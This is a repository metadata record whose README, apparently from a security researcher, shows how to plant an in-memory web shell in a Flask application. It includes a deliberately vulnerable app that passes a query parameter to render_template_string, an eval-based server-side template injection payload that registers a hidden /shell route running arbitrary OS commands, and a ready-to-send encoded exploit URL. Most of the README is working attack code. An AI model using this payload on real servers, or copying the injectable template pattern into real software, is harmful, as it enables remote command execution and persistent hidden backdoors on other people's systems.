{"id":13844193,"url":"https://github.com/iceyhexman/flask_memory_shell","last_synced_at":"2025-07-11T22:30:54.486Z","repository":{"id":112688532,"uuid":"351739467","full_name":"iceyhexman/flask_memory_shell","owner":"iceyhexman","description":"Flask memory shell","archived":false,"fork":false,"pushed_at":"2021-03-26T10:21:44.000Z","size":2,"stargazers_count":300,"open_issues_count":0,"forks_count":33,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-02-11T21:18:40.965Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/iceyhexman.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-03-26T10:10:55.000Z","updated_at":"2024-01-13T04:30:38.000Z","dependencies_parsed_at":null,"dependency_job_id":"e1f1c319-5f67-4fab-af58-e44f919a8ed2","html_url":"https://github.com/iceyhexman/flask_memory_shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/iceyhexman/flask_memory_shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/iceyhexman","download_url":"https://co
deload.github.com/iceyhexman/flask_memory_shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/iceyhexman%2Fflask_memory_shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264909966,"owners_count":23682096,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:36.965Z","updated_at":"2025-07-11T22:30:54.241Z","avatar_url":"https://github.com/iceyhexman.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"# Flask Memory Shell\n\nI keep running into scenarios where a memory shell is planted in Java, which made me think a memory shell could be tried in Flask as well.\n\nSimulate a Flask environment with an SSTI vulnerability:\n\n```python\nfrom flask import Flask,request\nfrom flask import render_template_string\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n    return 'Hello World'\n\n\n@app.route('/test',methods=['GET', 'POST'])\ndef test():\n    template = '''\n        \u003cdiv class=\"center-content error\"\u003e\n            \u003ch1\u003eOops! 
That page doesn't exist.\u003c/h1\u003e\n            \u003ch3\u003e%s\u003c/h3\u003e\n        \u003c/div\u003e \n    ''' %(request.values.get('fxxk'))\n\n    return render_template_string(template)\n\n\nif __name__ == '__main__':\n    app.run()\n```\n\nUse app.add_url_rule to add a route dynamically; the request context is on the _request_ctx_stack stack.\n\npayload:\n\n```\nurl_for.__globals__['__builtins__']['eval'](\"app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())\",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})\n```\n\n## Steps:\n\nSend the SSTI payload:\n\n```\nhttp://127.0.0.1:5000/test?fxxk={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}\n```\n\nVisit the /shell memory shell address:\n\n![image-20210326182004878](https://static.hexlt.org/img/20210326182010.png)\n\n## References:\n\nFlask context management mechanism: https://www.cnblogs.com/bigox/p/11652859.html\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ficeyhexman%2Fflask_memory_shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ficeyhexman%2Fflask_memory_shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ficeyhexman%2Fflask_memory_shell/lists"}